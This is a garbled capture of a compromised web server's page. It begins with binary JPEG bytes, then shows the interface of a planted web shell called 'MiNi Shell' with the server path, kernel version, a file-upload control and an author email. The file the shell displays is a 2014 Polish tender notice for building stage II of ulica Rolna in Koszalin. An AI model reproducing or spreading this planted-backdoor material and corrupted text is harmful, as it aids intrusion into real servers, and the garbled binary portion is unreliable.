JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140303/44813-N-2014.html

<p class="kh_header"><b>Koszalin: Budowa ulicy Rolnej wraz z infrastrukturą techniczną - etap II - odcinek przebiegający od ulicy Gdańskiej do ulicy Słupska/Piłsudskiego w Koszalinie</b><br>
<b>Numer ogłoszenia: 44813 - 2014; data zamieszczenia: 03.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Koszalin , Rynek Staromiejski 6-7, 75-007 Koszalin, woj. zachodniopomorskie, tel. 094 3488600, faks 094 3488625.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.koszalin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ulicy Rolnej wraz z infrastrukturą techniczną - etap II - odcinek przebiegający od ulicy Gdańskiej do ulicy Słupska/Piłsudskiego w Koszalinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa ulicy Rolnej wraz z infrastrukturą techniczną - etap II - odcinek przebiegający od ulicy Gdańskiej do ulicy Słupska/Piłsudskiego w Koszalinie:
Określenie przedmiotu zamówienia zawarte jest w Rozdziale II  SIWZ oraz   
w projekcie budowlano - wykonawczym oraz specyfikacjach technicznych wykonania i odbioru robót, które stanowią załączniki do niniejszej SIWZ.
Zakres zamówienia
1.	branża drogowa 
budowa ulicy -  odcinek przebiegający od ulicy Gdańskiej do ulicy Słupska/Piłsudskiego 
 w tym: 
Odcinek ulicy Rolnej długości  ca 580 m:
-	górna warstwa z bitumicznej mieszanki grysowo - mastyksowej typu SMA 0/8mm dla KR3/6 grub. 3 cm.
-  	azyl na jezdni z kostki brukowej betonowej kolorowej gr. 8cm, 
- 	wysepka najazdowa (korygujące/zwiększające łuki) przy ul. Słupskiej/Piłsudskiego z brukowca regularnego obrobionego 16/20. 
-	jezdnia manewrowa (wewnątrzparkingowych) górna warstwa z kostki brukowej betonowej gr. 8cm dla KR1.
-		stanowiska parkingowe górna warstwa z kostki brukowej betonowej kolorowej 
gr. 8cm.
-	zjazdy (typu publicznego) górna warstwa z kostki brukowej betonowej kolorowej gr. 8cm.
-	chodniki i ścieżki rowerowe(chodnik, opaski bezpieczeństwa, wysepki segregacyjne) górna warstwa z kostki brukowej betonowej gr. 6 cm.
-	chodniki i ścieżki rowerowe górna warstwa ścieralna z asfaltu piaskowego (lub z betonu asfaltowego 0/12,8 dla KR1/2) grubości 4 cm.
-	trawniki mieszanka torfu i ziemi urodzajnej z obsianiem mieszanką traw i nawożeniem gr. 10 cm.
-	w rejonie skrzyżowania ul. Rolnej z ul. Słupską - Piłsudskiego umocnienie skarpy nasypów poprzez geokraty o wys. 10cm z uzupełnieniem ziemią urodzajną i obsianiem trawą
-	wycinka drzew i krzewów. 
-	stałe oznakowanie poziome grubowarstwowe oraz pionowe.
-	regulacja studni i armatury.
Odcinek ulicy Rolnej - (odcinek ulicy Rolnej od wjazdu na stację paliw do początku opracowania dokumentacji budowy ul. Rolnej etap II) długości ca 40,0 m  w tym : 
   -	nawierzchnia, konstrukcje jezdni, zjazdu i chodników : należy przewidzieć wykonanie o takich samych parametrach jak odcinek ul Rolnej II etap dł. 580m
Uwaga :
w cenie ofertowej należy uwzględnić wykonanie tego odcinka ulicy (dł. ca 40,0 m) o tych samych parametrach (nawierzchni i konstrukcji), co dokumentacja podstawowa budowy ul. Rolnej etap II  - dł. 580m.
Odcinek tej ulicy nie jest uwzględniony w załączonych przedmiarach.

2.	branża sanitarna

2.1.	Kanalizacja deszczowa 
Zlewnia A
- zbiornik retencyjno-rozsączający  4,0 x 28,0 x 0,66 m  	
- separator koalescencyjny - 					
- kanał dn 300 bet.   						
- kanał dn 160 PCV 						
- zbiornik retencyjny dn 2000mm  L= 8,0 m 			
- studnie rewizyjne dn 1200 bet.  				
- wpusty deszczowe dn 500 					
- zabudowa wlotu rowu
Zlewnia B i C
- zbiornik retencyjny  dn 1200  L= 13,0 m  			
- kanał dn 300 bet.						
- kanał dn 200 PCV						
- kanał dn 60 PCV 						
- studnie rewizyjne dn 1200 bet.  				
- wpusty deszczowe dn 500 					
2.2.	Wodociąg
- wodociąg dn 160 PE 						
- wodociąg dn 110 PE 						
- wodociąg dn 90 PE 						
- regeneracja magistrali wodociągowej metodą Slipliningu dn630 PE 	
- rozbiórka komory 
- studnia odwadniająca dn 2000 mm  	
2.3. Usunięcie kolizji - przebudowa sieci gazowej
- gazociąg  PE  de 225 		
- gazociąg PE de 125
- gazociąg PE de 63 
2.4. Usunięcie kolizji sieci gazowej - (odcinek ulicy Rolnej od wjazdu na stację paliw do początku opracowania dokumentacji budowy ul. Rolnej etap II ) należy uwzględnić w cenie ofertowej wykonanie przełożenia gazociągu z rur PE de 225 długości ca 90 m 
Przełożenie gazociągu de 225 dł. 90m nie jest uwzględniony w załączonych przedmiarach.	
3.	branża elektryczna 
3.1 budowa oświetlenia drogowego
- Linia kablowa 0,4kV YAKXS 5x35mm2 			
- Linia kablowa 0,4kV YAKXS 4x35mm2
- Rury ochronne fi=75mm  (w tym przeciski)
- Latarnie drogowe łamane pojedynczy wysięgnik h-9m 
- Latarnie drogowe łamane podwójny wysięgnik h-9m 
- Latarnie drogowe z wysięgnikiem h-6m 
- Latarnie doświetlenia przejścia pieszego 
3.2 Oświetlenie drogowe - (odcinek ulicy Rolnej od wjazdu na stację paliw do początku opracowania dokumentacji budowy ul. Rolnej etap II - zjazd do Aquaparku wymiana istniejącego oświetlenia) należy uwzględnić w cenie ofertowej wymianę  oświetlenia na odcinku ulicy (dł. ca 40,0 m) w tym :
- Linia kablowa 0,4kV YAKXS 5x35mm2 - 					25mb
- Latarnia drogowa łamana pojedynczy wysięgnik h-9m - 			1szt
- Wymiana latarni drogowych łamanych pojedynczy wysięgnik h-9m - 	3szt
Wymiana oświetlenia tego odcinka ulicy nie jest uwzględniony w załączonych przedmiarach.
3.3 Branża teletechniczna - usunięcie kolizji
- Kanalizacja 6 otworowa 
- Studnia kablowa 
3.4. Branża teletechniczna - rurociąg kablowy pod monitoring
- Rurociąg kablowy 4 otworowy 
- Studnie kablowe SKO-2g 
3.5.	Usunięcie kolizji  w tym :
3.5.1.	usunięcie kolizji sieci n/n i s/n
- Linia kablowa 15kV 
- Przełożenie linii kablowej 15kV 
- Linia kablowa 0,4kV YAKXS 5x35mm2 
- Linia kablowa 0,4kV YAKXS 4x95mm2 
- Rury ochronne fi=110mm 
- Rury ochronne dwudzielne fi=160mm 
- Rury ochronne dwudzielne fi=160mm 
- Rury ochronne dwudzielne fi=110mm 
- Demontaż linii kablowej 0,4kV 
- Demontaż linii kablowej 15kV 
3.5.2. usunięcie kolizji z oświetleniem drogowym
- Linia kablowa 0,4kV YAKY 4x25mm2 
- Rura ochronna fi=75mm 
- Demontaż linii kablowej 0,4kV 
- Demontaż latarni oświetleniowej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.13.00-8, 45.23.12.20-3, 45.31.61.10-9, 45.31.40.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 100,00 tys. zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek jeżeli złoży wraz z ofertą podpisane oświadczenie, że spełnia warunki określone w art. 22 ust. 1 PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek jeżeli wykaże, że posiada doświadczenie zawodowe, legitymując się wykonaniem (zakończone) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, tj. wykonał co najmniej:
-	budowę drogi w rozumieniu ustawy o drogach publicznych, o nawierzchni asfaltowej i wartości robót minimum 2.300 tys. zł, 
-	budowę sieci kanalizacji deszczowej lub sanitarnej  o wartości minimum 
500  tys. zł ,  
-	budowę sieci    wodociągowej  o wartości robót minimum  100 tys. zł , 
-	budowę oświetlenie ulicy  o wartości minimum 100 tys. zł 
Łączna wartość w/w robót musi wynosić minimum 3.000 tys. zł. i zrealizowana jako jedno  zamówienie.

Zamawiający uzna również:

Wyżej wymienione roboty  mogą  być wykonane jako zadania niezależne  - jako osobne zadania inwestycyjne, każde o wartości minimum jak wyżej. 
W wykazie robót należy podać wartość w/w robót. Łączna ich wartość musi wynosić   minimum 3.000  tys. zł .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek jeżeli złoży wraz z ofertą podpisane oświadczenie, że spełnia warunki określone w art. 22 ust. 1 PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia w zakresie objętym zamówieniem, z niezbędnymi uprawnieniami  zgodnie z wymogami prawa budowlanego, które będą pełniły funkcje: 
-	kierownika budowy i kierownika robót drogowych,
-	kierownika robót sanitarnych, 
-	kierownika robót elektrycznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający uzna, że Wykonawca spełnia ww. warunek jeżeli wykaże, że posiada środki finansowe lub zdolność kredytową z uwzględnieniem potrącenia na inne zobowiązania umowne w wysokości minimum 600.000,00 zł zapewniając tym zdolność do finansowania robót w trakcie realizacji pomiędzy płatnościami ze strony Zamawiającego. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazują łącznie spełnianie w/w warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ofertę może złożyć tylko podmiot do tego uprawniony. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, Pełnomocnictwo do reprezentowania Wykonawcy określające jego zakres winno być również złożone wraz z ofertą (o ile nie wynika to z innych dokumentów załączonych do oferty) i podpisane przez osoby uprawnione do reprezentowania wykonawcy. Pełnomocnictwo należy złożyć w oryginale, w przypadku kserokopii pełnomocnictwo musi być poświadczone notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zostały określone w projekcie umowy - Rozdział V SIWZ.
 
1. ZAMAWIAJACY dopuszcza możliwość dokonania zmian postanowień zawartej umowy dotyczących podwykonawców, o których mowa w art. 26 ust. 2b ustawy Prawo zamówień publicznych. Jeżeli zmiana albo rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
2.  ZAMAWIAJACY dopuszcza możliwość dokonania zmian postanowień zawartej umowy 
     dotyczących osób, którymi dysponuje WYKONWCA na zasadach innych niż określone w ust.1. W takim przypadku Wykonawca zobowiązany jest wskazać osoby do realizacji zamówienia posiadające kwalifikacje nie niższe niż wymagane w trakcie postępowania o udzielenie zamówienia.
3. ZAMAWIAJACY dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w zakresie terminu wykonania zamówienia w przypadku:
	1)   działania siły wyższej w rozumieniu przepisów Kodeksu cywilnego;
      2) braku możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych;
	3) wstrzymania robót przez ZAMAWIAJĄCEGO lub przerw w wykonywaniu robót powstałych na skutek okoliczności, za które ponosi odpowiedzialność ZAMAWIAJĄCY;
	4) wstrzymania robót przez właściwy organ z przyczyn niezawinionych przez WYKONAWCĘ;
	5) wystąpienia konieczności wykonania zamówienia dodatkowego w rozumieniu 
art. 67 ust.1 pkt 5 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.), którego realizacja będzie miała wpływ na termin wykonania przedmiotu umowy;
6)  zaistnienia innych okoliczności, które nie powstały z winy WYKONAWCY.
4.	Podstawą dokonania zmian, o których mowa w ust. 3, będzie protokół konieczności określający wystąpienie okoliczności uzasadniających wprowadzenie zmian.
5.  W przypadku wniosku WYKONAWCY o dokonanie zmiany, o której mowa w ust. 1 i 2, WYKONAWCA obowiązany jest przedstawić dokumenty potwierdzające kwalifikacje wskazywanych osób pozwalające na stwierdzenie spełniania przez wskazane osoby wymagań SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.koszalin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Koszalinie, Biuro Zamówień Publicznych, ul. A. Mickiewicza 26, 75-004 Koszalin, I piętro, pokój nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2014 godzina 09:00, miejsce: Urząd Miejski w Koszalinie, Biuro Zamówień Publicznych, ul. A. Mickiewicza 26, 75-004 Koszalin, I piętro, pokój nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com